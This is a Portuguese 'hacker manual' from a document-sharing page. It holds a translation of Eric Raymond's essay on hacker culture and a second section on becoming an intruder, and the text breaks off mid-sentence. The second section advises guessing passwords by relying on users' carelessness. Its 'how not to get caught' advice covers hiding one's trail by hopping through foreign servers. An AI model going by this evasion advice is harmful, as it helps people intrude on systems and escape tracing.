93
Manual Hacker

Manual Hacker - Web viewClique no logotipo do Word que fica no ... ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Embed Size (px)

Citation preview

Page 1: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Manual Hacker

ADVERTÊNCIA: Este documento foi criado para informação apenas. De nenhuma forma, encorajando qualquer tipo de atividade ilegal, e qualquer ato praticado após a leitura deste documento é de inteira responsabilidade do leitor.

Page 2: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Índice

1. Introdução2. Como ser um hacker?3. Ataques via FTP4. Criar nº de CPF5. Lammers do Linux6. O que são Exploits?7. Hackeando Front Pages8. Hackeando Web Pages9. Descobrindo Ip's10. IrcWar11.Kevin Mitnick12.Nuke13.Ovos de Páscoa14.Porta 66615.Proxys16.Regedit17.Telnet18.VBscript

Page 3: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Introdução

O que é um hacker?O Jargon File contém um monte de definições do termo "hacker", a maioria deles tendo a ver com aptidão técnica e um prazer em resolver problemas e superar limites. Se você quer saber como se tornar um hacker, entretanto, apenas duas são realmente relevantes.

Existe uma comunidade, uma cultura compartilhada, de programadores experts e gurus de rede cuja história remonta a decadas atrás, desde os primeiros minicomputadores de tempo compartilhado e os primeiros experimentos na ARPAnet. Os membros dessa cultura deram origem ao termo "hacker". Hackers construíram a Internet. Hackers fizeram do sistema operacional Unix o que ele é hoje. Hackers mantém a Usenet. Hackers fazem a World Wide Web funcionar. Se você é parte desta cultura, se você contribuiu a ela e outras pessoas o chamam de hacker, você é um hacker.

A mentalidade hacker não é confinada a esta cultura do hacker-de-software. Há pessoas que aplicam a atitude hacker em outras coisas, como eletrônica ou música -- na verdade, você pode encontrá-la nos níveis mais altos de qualquer ciência ou arte. Hackers de software reconhecem esses espíritos aparentados de outros lugares e podem chamá-los de "hackers" também -- e alguns alegam que a natureza hacker é realmente independente da mídia particular em que o hacker trabalha. Mas no restante deste documento, nos concentraremos nas habilidades e dos hackers de software, e nas tradições da cultura compartilhada que deu origem ao termo `hacker'.

Existe outro grupo de pessoas que se dizem hackers, mas não são. São pessoas (adolescentes do sexo masculino, na maioria) que se divertem invadindo computadores e fraudando o sistema telefônico. Hackers de verdade chamam essas pessoas de "crackers", e não tem nada a ver com eles. Hackers de verdade consideram os crackers preguiçosos, irresponsáveis, e não muito espertos, e alegam que ser capaz de quebrar sistemas de segurança torna alguém hacker tanto quanto fazer ligação direta em carros torna alguém um engenheiro automobilístico. Infelizmente, muitos jornalistas e escritores foram levados a usar, errôneamente, a palavra "hacker" para descrever crackers; isso é muito irritante para os hackers de verdade.

A diferença básica é esta: hackers constróem coisas, crackes as destróem.

Se você quer ser um hacker, continue lendo. Se você quer ser um cracker, vá ler o newsgroup alt.2600 e se prepare para se dar mal depois de descobrir que você não é tão esperto quanto pensa. E isso é tudo que eu digo sobre crackers.

A Atitude HackerHackers resolvem problemas e constróem coisas, e acreditam na liberdade e na ajuda mútua voluntária. Para ser aceito como um hacker, você tem que se

Page 4: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

comportar de acordo com essa atitude. E para se comportar de acordo com essa atitude, você tem que realmente acreditar nessa atitude.

Mas se você acha que cultivar a atitude hacker é somente um meio para ganhar aceitação na cultura, está enganado. Tornar-se o tipo de pessoa que acredita nessas coisas é importante para você -- para ajudá-lo a aprender e manter-se motivado. Assim como em todas as artes criativas, o modo mais efetivo para se tornar um mestre é imitar a mentalidade dos mestres -- não só intelectualmente como emocionalmente também.

Então, se você quer ser um hacker, repita as seguinte coisas até que você acredite nelas:1. O mundo está repleto de problemas fascinantes esperando para serem resolvidos.Ser hacker é muito divertido, mas é um tipo de diversão que necessita de muito esforço. Para haver esforço é necessário motivação. Atletas de sucesso retiram sua motivação de uma espécie de prazer físico em trabalhar seus corpos, em tentar ultrapassar seus próprios limites físicos. Analogamente, para ser um hacker você precisa ter uma emoção básica em resolver problemas, afiar suas habilidades e exercitar sua inteligência. Se você não é o tipo de pessoa que se sente assim naturalmente, você precisará se tornar uma para ser um hacker. Senão, você verá sua energia para "hackear" sendo esvaída por distrações como sexo, dinheiro e aprovação social.

(Você também tem que desenvolver uma espécie de fé na sua própria capacidade de aprendizado -- crer que, mesmo que você não saiba tudo o que precisa para resolver um problema, se souber uma parte e aprender a partir disso, conseguirá aprender o suficiente para resolver a próxima parte -- e assim por diante, até que você termine.)

2. Não se deve resolver o mesmo problema duas vezes.Mentes criativas são um recurso valioso e limitado. Não devem ser desperdiçadas reinventando a roda quando há tantos problemas novos e fascinantes por aí.

Para se comportar como um hacker, você tem que acreditar que o tempo de pensamento dos outros hackers é precioso -- tanto que é quase um dever moral compartilhar informação, resolver problemas e depois dar as soluções, para que outros hackers possam resolver novos problemas ao invés de ter que se preocupar com os antigos indefinidamente. (Você não tem que acreditar que é obrigado a dar toda a sua produção criativa, ainda que hackers que o fazem sejam os mais respeitados pelos outros hackers. Não é inconsistente com os valores do hacker vender o suficiente da sua produção para mantê-lo alimentado e pagar o aluguel e computadores. Não é inconsistente usar suas habilidades de hacker para sustentar a família ou mesmo ficar rico, contanto que você não esqueça que é um hacker.)

3. Tédio e trabalho repetitivo são nocivos.

Page 5: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Hackers (e pessoas criativas em geral) não podem ficar entediadas ou ter que fazer trabalho repetitivo, porque quando isso acontece significa que eles não estão fazendo o que apenas eles podem fazer -- resolver novos problemas. Esse desperdício prejudica a todos. Portanto, tédio e trabalho repetitivo não são apenas desagradáveis, mas nocivos também.

Para se comportar como um hacker, você tem que acreditar nisso de modo a automatizar as partes chatas tanto quanto possível, não apenas para você como para as outras pessoas (principalmente outros hackers).

(Há uma exceção aparente a isso. Às vezes, hackers fazem coisas que podem parecer repetitivas ou tediosas para um observador, como um exercício de "limpeza mental", ou para adquirir uma habilidade ou ter uma espécie particular de experiência que não seria possível de outro modo. Mas isso é por opção -- ninguém que consiga pensar deve ser forçado ao tédio.

4. Liberdade é uma coisa boa.Hacker são naturalmente anti-autoritários. Qualquer pessoa que lhe dê ordens pode impedi-lo de resolver qualquer que seja o problema pelo qual você está fascinado -- e, dado o modo em que a mente autoritária funciona, geralmente arranjará alguma desculpa espantosamente idiota isso. Então, a atitude autoritária deve ser combatida onde quer que você a encontre, para que não sufoque a você e a outros hackers.

(Isso não é a mesma coisa que combater toda e qualquer autoridade. Crianças precisam ser orientadas, e criminosos, detidos. Um hacker pode aceitar alguns tipos de autoridade a fim de obter algo que ele quer mais que o tempo que ele gasta seguindo ordens. Mas isso é uma barganha restrita e consciente; não é o tipo de sujeição pessoal que os autoritários querem.)

Pessoas autoritárias prosperam na censura e no segredo. E desconfiam de cooperação voluntária e compartilhamento de informação -- só gostam de "cooperação" que eles possam controlar. Então, para se comportar como um hacker, você tem que desenvolver uma hostilidade instintiva à censura, ao segredo, e ao uso da força ou mentira para compelir adultos responsáveis. E você tem que estar disposto a agir de acordo com esta crença.

5. Atitude não substitui competência.Para ser um hacker, você tem que desenvolver algumas dessas atitudes. Mas apenas ter uma atitude não fará de você um hacker, assim como não o fará um atleta campeão ou uma estrela de rock. Para se tornar um hacker é necessário inteligência, prática, dedicação, e trabalho duro.

Portanto, você tem que aprender a desconfiar de atitude e respeitar todo tipo de competência. Hackers não deixam posers gastar seu tempo, mas eles idolatram competência -- especialmente competência em "hackear", mas competência em qualquer coisa é boa. A competência em habilidades que poucos conseguem

Page 6: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

dominar é especialmente boa, e competência em habilidades que involvem agudeza mental, perícia e concentração é a melhor.

Se você reverenciar competência, gostará de desenvolvê-la em si mesmo -- o trabalho duro e dedicação se tornará uma espécie de um intenso jogo, ao invés de trabalho repetitivo. E isso é vital para se tornar um hacker.

Habilidades básicas do hackerA atitude hacker é vital, mas habilidades são ainda mais vitais. Atitude não substitui competência, e há uma certo conjunto de habilidades que você precisa ter antes que um hacker sonhe em lhe chamar de um.

Esse conjunto muda lentamente com o tempo, de acordo com a criação de novas habilidades. Por exemplo, costumava incluir programação em linguagem de máquina, e até recentemente não incluía HTML. Mas agora é certo que inclui o seguinte:

1. Aprenda a programar.Essa é, claro, a habilidade básica do hacker. Em 1997, a linguagem que você absolutamente precisa aprender é C (apesar de não ser a que você deve aprender primeiro). Mas você não é um hacker e nem mesmo um programador se você souber apenas uma linguagem -- você tem que aprender a pensar sobre problemas de programação de um modo geral, independentemente de qualquer linguagem. Para ser um hacker de verdade, você precisa ter chegado ao ponto de conseguir aprender uma nova linguagem em questão de dias, relacionando o que está no manual ao que você já sabe. Isso significa que você deve aprender várias linguagens bem diferentes.

Além de C, você também deve aprender pelo menos LISP e Perl (e Java está tentando pegar um lugar nessa lista). Além de serem as linguagens mais importantes para hackear, cada uma delas representa abordagens à programaçaão bem diferentes, e todas o educarão em pontos importantes.

Eu nao posso lhe dar instruções completas sobre como aprender a programar aqui -- é uma habilidade complexa. Mas eu posso lhe dizer que livros e cursos também não servirão (muitos, talvez a maioria dos melhores hacker são auto-didatas). O que servirá é (a) ler código e (b) escrever código.

Aprender a programar é como aprender a escrever bem em linguagem natural. A melhor maneira é ler um pouco dos mestres da forma, escrever algumas coisas, ler mais um monte, escrever mais um monte, ler mais um monte, escrever... e repetir até que seu estilo comece a desenvolver o tipo de força e economia que você vê em seus modelos.

Achar bom código para ler costumava ser difícil, porque havia poucos programas grandes disponíveis em código-fonte para que hackers novatos pudessem ler e mexer. Essa situação mudou dramaticamente; open-source software (software

Page 7: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

com código-fonte aberto), ferramentas de programação, e sistemas operacionais (todos feitos por hackers) estão amplamente disponíveis atualmente.2. Pegue um dos Unixes livres e aprenda a mexer.Estou assumindo que você tem um computador pessoal ou tem acesso a um (essas crianças de hoje em dia tem tão facilmente :-)). O passo mais importante que um novato deve dar para adquirir habilidades de hacker é pegar uma cópia do Linux ou de um dos BSD-Unixes, o instalar em um PC, e rodá-lo.

Sim, há outros sistemas operacionais no mundo além do Unix. Porém, eles são distribuídos em forma binária -- você não consegue ler o código, e você não consegue modificá-lo. Tentar aprender a "hackear" em DOS, Windows ou MacOS é como tentar aprender a dançar com o corpo engessado.

Além disso, Unix é o sistema operacional da Internet. Embora você possa aprender a usar a Internet sem conhecer Unix, você não pode ser um hacker sem entendê-lo. Por isso, a cultura hacker, atualmente, é fortemente centralizada no Unix. (Não foi sempre assim, e alguns hackers da velha guarda não gostam da situação atual, mas a simbiose entre o Unix e a Internet se tornou tão forte que até mesmo o músculo da Microsoft não parece ser capaz de ameacá-la seriamente.)

Então, pegue um Unix -- eu gosto do Linux, mas existem outros caminhos. Aprenda. Rode. Mexa. Acesse a Internet através dele. Leia o código. Modifique o código. Você terá ferramentas de programação (incluindo C, Lisp e Perl) melhores do qualquer sistema operacional da Microsoft pode sonhar em ter, você se divertirá, e irá absorver mais conhecimento do que perceber, até que você olhará para trás como um mestre hacker.

Para aprender mais sobre Unix, veja The Loginataka.

Para pegar o Linux, veja Where To Get Linux.3. Aprenda a usar a World Wide Web e escrever em HTML.A maioria das coisas que a cultura hacker tem construído funciona "invisivelmente", ajudando no funcionamento de fábricas, escritórios e universidades sem nenhum óbvio na vida dos não-hackers. A Web é a grande exceção, o enorme e brilhante brinquedo dos hackers que até mesmo políticos admitem que está mudando o mundo. Por esse motivo (e vários outros também) você precisa a aprender como trabalhar na Web.

Isso não significa apenas aprender a mexer em um browser (qualquer um faz isso), mas aprender a programar em HTML, a linguagem de markup da Web. Se você não sabe programar, escrever em HTML lhe ensinará alguns hábitos mentais que o ajudarão. Então faça uma home page.

Mas apenas ter uma home page não chega nem perto de torná-lo um hacker. A Web está repleta de home pages. A maioria delas é inútil, porcaria sem conteúdo -- porcaria muito bem apresentada, note bem, mas porcaria mesmo assim (mais sobre esse assunto em The HTML Hell Page).

Page 8: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Para valer a pena, sua página deve ter conteúdo -- deve ser interessante e/ou útil para outros hackers. E isso nos leva ao próximo assunto...

Status na Cultura HackerComo a maioria das culturas sem economia monetária, a do hacker se baseia em reputação. Você está tentando resolver problemas interessantes, mas quão interessantes eles são, e se suas soluções são realmente boas, é algo que somente seus iguais ou superiores tecnicamente são normalmente capazes de julgar.

Conseqüentemente, quando você joga o jogo do hacker, você aprende a marcar pontos principalmente pelo que outros hackers pensam da sua habilidade (por isso você não é hacker até que outros hackers lhe chamem assim). Esse fato é obscurecido pela imagem solitária que se faz do trabalho do hacker; e também por um tabu hacker-cultural que é contra admitir que o ego ou a aprovação externa estão envolvidas na motivação de alguém.

Especificamente, a cultura hacker é o que os antropologistas chamam de cultura de doação. Você ganha status e reputação não por dominar outras pessoas, nem por ser bonito, nem por ter coisas que as pessoas querem, mas sim por doar coisas. Especificamente, por doar seu tempo, sua criatividade, e os resultados de sua habilidade.

Há basicamente cinco tipos de coisas que você pode fazer para ser respeitado por hackers:

1. Escrever open-source software.O primeiro (o mais central e mais tradicional) é escrever programas que outros hackers achem divertidos ou úteis, e dar o código-fonte para que toda a cultura hacker use.

(Nós costumávamos chamar isto de "free software", mas isso confundia muitas pessoas que não sabiam ao certo o significado de "free". Agora, muitos de nós preferem o termo "open-source" software).

[nota do tradutor: "free" significa tanto "livre" como "gratuito", daí a confusão. O significado que se pretende é "livre".] Os "semi-deuses" mais venerados da cultura hacker são pessoas que escreveram programas grandes, competentes, que encontraram uma grande demanda e os distribuíram para que todos pudessem usar.

2. Ajude a testar e depurar open-source softwareTambém estão servindo os que depuram open-source software. Neste mundo imperfeito, inevitavelmente passamos a maior parte do tempo de desenvolvimento na fase de depuração. Por isso, qualquer autor de open-source software que pense lhe dirá que bons beta-testers (que saibam descrever sintomas claramente,

Page 9: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

localizar problemas, tolerar bugs em um lançamento apressado, e estejam dispostos a aplicar algumas rotinas de diagnóstico) valem seu peso em ouro. Até mesmo um desses beta-testers pode fazer a diferença entre uma fase de depuração virar um longo e cansativo pesadelo, ou ser apenas um aborrecimento saudável. Se você é um novato, tente achar um programa sob desenvolvimento em que você esteja interessado e seja um bom beta-tester. Há um progressão natural de ajudar a testar programas para ajudar a depurar e depois ajudar a modificá-los. Você aprenderá muito assim, e criará um bom karma com pessoas que lhe ajudarão depois.

3. Publique informação útil.Outra boa coisa a se fazer é coletar e filtrar informações úteis e interessantes em páginas da Web ou documentos como FAQs ("Frequently Asked Questions lists", ou listas de perguntas freqüentes), e torne-os disponíveis ao público.

Mantenedores de grandes FAQs técnicos são quase tão respeitados quanto autores de open-source software.

4. Ajude a manter a infra-estrutura funcionando.A cultura hacker (e o desenvolvimento da Internet, quanto a isso) é mantida por voluntários. Existe muito trabalho sem glamour que precisa ser feito para mantê-la viva -- administrar listas de email, moderar grupos de discussão, manter grandes sites que armazenam software, desenvolver RFCs e outros padrões técnicos.

Pessoas que fazem bem esse tipo de coisa são muito respeitadas, porque todo mundo sabe que esses serviços tomam muito tempo e não são tão divertidos como mexer em código. Fazê-los mostra dedicação.

5. Sirva a cultura hacker em si.Finalmente, você pode servir e propagar a cultura em si (por exemplo, escrevendo um apurado manual sobre como se tornar um hacker :-)). Você só terá condição de fazer isso depois de ter estado por aí por um certo tempo, e ter se tornado conhecido por uma das primeiras quatro coisas.

A cultura hacker não têm líderes, mas têm seus heróis culturais, "chefes tribais", historiadores e porta-vozes. Depois de ter passado tempo suficiente nas trincheiras, você pode ser tornar um desses. Cuidado: hackers desconfiam de egos espalhafatosos em seus "chefes tribais", então procurar visivelmente por esse tipo de fama é perigoso. Ao invés de se esforçar pela fama, você tem que de certo modo se posicionar de modo que ela "caia" em você, e então ser modesto e cortês sobre seu status.

A Conexão Hacker/NerdContrariamente ao mito popular, você não tem que ser um nerd para ser um hacker. Ajuda, entretanto, e muitos hackers são de fato nerds. Ser um proscrito social o ajuda a se manter concentrado nas coisas realmente importantes, como pensar e "hackear".

Page 10: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Por isso, muitos hackers adotaram o rótulo "nerd", e até mesmo usam o termo (mais duro) "geek" como um símbolo de orgulho -- é um modo de declarar sua independência de expectativas sociais normais. Veja The Geek Page para discussão extensiva.

Se você consegue se concentrar o suficiente em hackear para ser bom nisso, e ainda ter uma vida, está ótimo. Isso é bem mais fácil hoje do que quando era um novato nos anos 70; atualmente a cultura mainstream é muito mais receptiva a tecno-nerds. Há até mesmo um número crescente de pessoas que percebem que hackers são, freqüentemente, amantes e cônjuges de alta qualidade. Girl's Guide to Geek Guys.

Se hackear o atrai porque você não vive, tudo bem -- pelo menos você não terá problemas para se concentrar. Talvez você consiga uma vida normal depois.

Pontos Sobre EstiloPara ser um hacker, você tem que entrar na mentalidade hacker. Há algumas coisas que você pode fazer quando não estiver na frente de um computador e que podem ajudar. Não substituem o ato de hackear (nada substitui isso), mas muitos hackers as fazem, e sentem que elas estão ligadas de uma maneira básica com a essência do hacking.

* Leia ficção científica. Freqüente convenções de ficção científica (uma boa maneira de encontrar hackers e proto-hackers). * Stude o Zen, e/ou faça artes marciais. (A disciplina mental parece similar em pontos importantes). * Desenvolva um ouvido analítico para música. Aprenda a apreciar tipos peculiares de música. Aprenda a tocar bem algum instrumento musical, ou a cantar. * Desenvolva sua apreciação de trocadilhos e jogo de palavras. * Aprenda a escrever bem em sua língua nativa. (Um número surpreendente de hackers, incluindo todos os melhores que eu conheço, são bons escritores.)

Quanto mais dessas coisas você já fizer, mais provável que você tenha naturalmente um material hacker. Por que essas coisas em particular não é completamente claro, mas elas são ligadas com uma mistura de habilidades dos lados esquerdo e direito do cérebro que parece ser muito importante (hackers precisam ser capazes de tanto raciocinar logicamente quanto pôr de lado, de uma hora para outra, a lógica aparente do problema).

Finalmente, algumas coisas a não serem feitas.

* Não use um nome de usuário ou pseudônimo bobo e grandioso. * Não entre em flame wars ("guerrinhas") na Usenet (ou em qualquer outro lugar).

Page 11: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

* Não se auto-intitule um "cyberpunk", e não perca seu tempo com alguém que o faça. * Não poste ou escreve email cheio de erros de ortografia e gramática.

A única reputação que você conseguirá fazendo alguma dessas coisas é a de um twit [um chato, geralmente filtrado nos grupos de discussão]. Hackers tem boa memória -- pode levar anos antes que você se reabilite o suficiente para ser aceito.

Outros RecursosO Loginataka tem algumas coisas a dizer sobre o treinamento e a atitude adequados a um hacker de Unix.

Eu também escrevi A Brief History Of Hackerdom.

Peter Seebach mantém um excelente Hacker FAQ para gerentes que não sabem como lidar com hackers.

Eu escrevi um documento, The Cathedral and the Bazaar ("A Catedral e o Bazar"), que explica muito sobre como o Linux e as culturas de open-source software funcionam.

Perguntas FreqüentesQ: Você me ensina como "hackear"?Desde que publiquei essa página, recebi vários pedidos por semana de pessoas querendo que eu "ensinasse tudo sobre hacking". Infelizmente, eu não tenho tempo nem energia para isso; meus próprios projetos hackers tomam 110% do meu tempo.

Mesmo se eu fizesse, hacking é uma atitude e uma habilidade na qual você tem que basicamente ser auto-didata. Você verá que, embora hackers de verdade queiram lhe ajudar, eles não o respeitarão se você pedir "mastigado" tudo que eles sabem.

Aprenda algumas coisas primeiro. Mostre que você está tentando, que você é capaz de aprender sozinho. Depois faça perguntas aos hackers que encontrar.

Q: Onde eu posso encontrar hackers de verdade para conversar?Bem, não no IRC, com certeza -- lá só existem flamers e crackers. A melhor maneira é encontrar um grupo de usuários local de Unix ou Linux, e freqüentar as reuniões (você pode encontrar links para várias listas de grupos de usuários na página da LDP em Sunsite).

Q: Que linguagem devo aprender primeiro?HTML, se você ainda não souber. Existe um monte de livros sobre HTML lustrosos, modistas e ruins por aí e, infelizmente, pouquíssimos bons. O livro de que mais gosto é HTML: The Definitive Guide.

Page 12: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Quando você estiver pronto pra começar a programar, eu recomendaria começar com Perl ou Python. C é realmente importante, mas muito mais difícil.

Q: Mas o open-source software não deixará os programadores incapazes de ganhar a vida?Parece improvável -- até agora, a indústria de open-source software parece estar criando empregos ao invés de tirá-los. Se ter escrito um programa é ganho econômico em relação a não tê-lo escrito, um programador será pago independentemente de o programa ser livre depois de feito. E, independentemente de quanto open-source software é feito, sempre parece haver mais demanda por aplicações novas e personalizadas.

Q: Como eu começo? Onde posso pegar um Unix livre?Em outro lugar da página eu incluí ponteiros onde pegar o Linux. Para ser um hacker você precisa de motivação, iniciativa e capacidade de se educar. Comece agora...

Page 13: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Como ser um hacker?

Como me Transformar em um Hacker?

Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notícias, através de e-mail, em salas de chat. Não há nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas há uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levará a lugar algum.

Conseguindo Ajuda

É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma página na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficará ligeiramente disapontado. Claro! há alguns hackers genuinos por aí, e se você conseguir encontrá-los, poderá pedir ajuda. Mas aí você estará dependendo de alguém para tudo. Um hacker deve ser autoditada.

Algumas Outras Necessidades

É importante saber e aceitar que você estará sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você está tentando ser parte de uma minoria que é odiada pelo grande público da área, por causa de imagem ruim que é comumente difundida. Deve discordar de comentários negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessário admitir que você sabe apenas 1 por cento do que há para se saber sobre o mundo da informática e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, já notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciável por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?

Tomando Os Primeiros Passos

Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, básicos. Aqui o

Page 14: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irá apresentar-lhe uma interface gráfica interessante, é um ambiente de somente texto, como o DOS. Não há gráficos, apenas um simples e extremamente eficiente sistema operacional que está muito a frente de seu tempo, desde quando foi criado. É claro que você poderá encontrar o X-Windows em máquinas Unix e rodar uma enorme variedade de aplicativos gráficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuído gratuitamente para UNIX e seus variantes, e desta forma você deve estudá-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições básicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderá "penetrar" em um sistema se você não sabe usá-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem está conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você será. Saber também um pouco de linguagem C é também imperativo, desde que você irá precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,... Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primárias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mágicas coisas chamadas livros.Agora que você tem um entendimento total sobre UNIX, você poderá aprender como contornar a segurança nestes sistemas. Existem vários arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginária nas falhas em vários serviços, e então quando você inspecionar um sistema ele irá surgir em sua mente.

A Psicologia de Hacke(ar)

É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto será decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.

Nunca Pare de Aprender

Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em

Page 15: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicídio se você odeia matemática). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!

Fazendo a Conexão

Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me conecto a um sistema ?" ou "Como eu uso o Telnet ?" Para explicar algumas questões básicas: Você pode se conectar com qualquer máquina ligada na Internet com um programa de Telnet. Muitos programas utilizam o serviço de telnet quando você conecta-se a uma máquina. Por exemplo, se eu rodar meu programa e conectar com o xyz.com, ele irá me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simplesmente, é um meio de se usar um terminal UNIX, como se você estivesse sentado em frente a um. Imagine estar discando em uma máquina em ambiente DOS e recebendo o prompt C:\>. É essencialmente a mesma coisa. Quando você aprender sobre UNIX, você verá que existem outros serviços (também conhecido como dameons), e poderá usar um programa de Telnet para conectar-se a vários deles. Onde encontrar tais programas ? Que tal em http://www.tucows.com/, eles possuem vários deles.

Se você puder instalar uma variação do UNIX como o LINUX em seu computador, eu certamente sugiro-lhe que o faça. Este é o melhor caminho para aprender o sistema operacional. Além disso, o LINUX possui excelentes utilitários que o acompanham, como o GNU C compiler.

Também é importante identificar um erro comum que os iniciantes cometem quando aprendem por arquivos de texto. Não confundam TELENET com TELNET. TELENET é uma grande rede de servidores, agora também conhecido como SprintNet. Possui um sistema operacional especial e é acessado por números de acesso discado com um programa de terminal. Uma vez conectado você pode acessar diferentes servidores pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet é uma prática arriscada, por ser fácilmente rastreada. Você está discado diretamente na rede de sua linha telefônica. Novamente, um servidor pode simplesmente gravar o seu endereço IP se você conectar-se na Internet e usar a identificação de cliente para possivelmente conseguir o seu username do seu provedor.

Como Não Ser Pego

O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posíveis. Quanto menos pessoas souberem que você está nisso,

Page 16: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método está agora, "fora de moda", desde que existem meios mais fáceis de esconder sua identidade quando hack(eando) pela Internet. Existem vários meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornará o rastreamento muito mais difícil. Tente conectar-se a sistemas localizados em outros países. Nunca tente hack(ear) uma instituição governamental, você irá ser pego e irá para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem está ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terá de ser pego.

Último, Mas Muito Importante

Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você está no mesmo nível de um criminoso. Todo hacker possui um código de ética.

Você Não é um Hacker se

